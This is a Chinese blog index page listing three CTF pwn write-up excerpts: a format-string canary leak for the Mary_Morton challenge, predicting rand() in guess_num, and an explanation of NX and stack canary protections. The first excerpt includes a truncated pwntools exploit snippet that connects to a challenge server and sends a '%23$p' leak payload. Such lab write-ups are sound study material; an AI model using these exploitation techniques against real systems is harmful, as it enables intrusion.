- 博客(3)
- 收藏
- 关注
RSS订阅原创 Mary_Morton
之前有讲到canary的原理,这道题就用到了。checksecida可以看到scanf是我们可以利用的格式化字符串漏洞,因此我们可以确认偏移了6个字节而v2其实就是canary,通过观察buf所在的栈,发现偏移了0x88,那么就可以开始写代码了。代码from pwn import*s=remote('220.249.52.133',48752)sys=0x4008des.recvuntil('battle')s.sendline('2')s.sendline('%23$p')
2020-08-19 09:41:36
254
原创 攻防世界pwn新手区guess_num
最近重新回去看新手区的题目时发现一个挺有趣的东西,就是猜随机数,这里涉及到libc库中的rand()和srand()函数的应用,所以在讲题目之前我想先讲一下rand()和srand()函数的概念。rand()函数会生成随机数,但这个随机数并不是真的随机数,由于周期比较长,他们只是在一定范围内随机,因此在调用rand()函数之前,可以使用srand()函数设置随机数种子,如果没有设置随机数种子,rand()函数在调用时,自动设计随机数种子为1。而srand()中的种子seed通常会用time(0)或geyp
2020-08-09 10:28:35
746
原创 两种保护机制:NX和Canary
因为自己学的比较慢,自学能力也比较差,假期过去挺久了,进度也才跟进到保护机制,可能接下来会花比较长的时间在这里。而保护机制我是从最简单的NX保护机制开始学起的,NX典型的例子有ret2syscall和libc,为了便于理解为什么有这种保护机制以及为什么需要这种保护机制,我去网上找了一些NX的原理。NX即No-eXecute(不可执行)的意思,NX(DEP)的基本原理是将数据所在内存页标识为不可执行,当程序溢出成功转入shellcode时,程序会尝试在数据页面上执行指令,此时CPU就会抛出异常,而不是去执行
2020-07-31 09:58:58
6025
1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人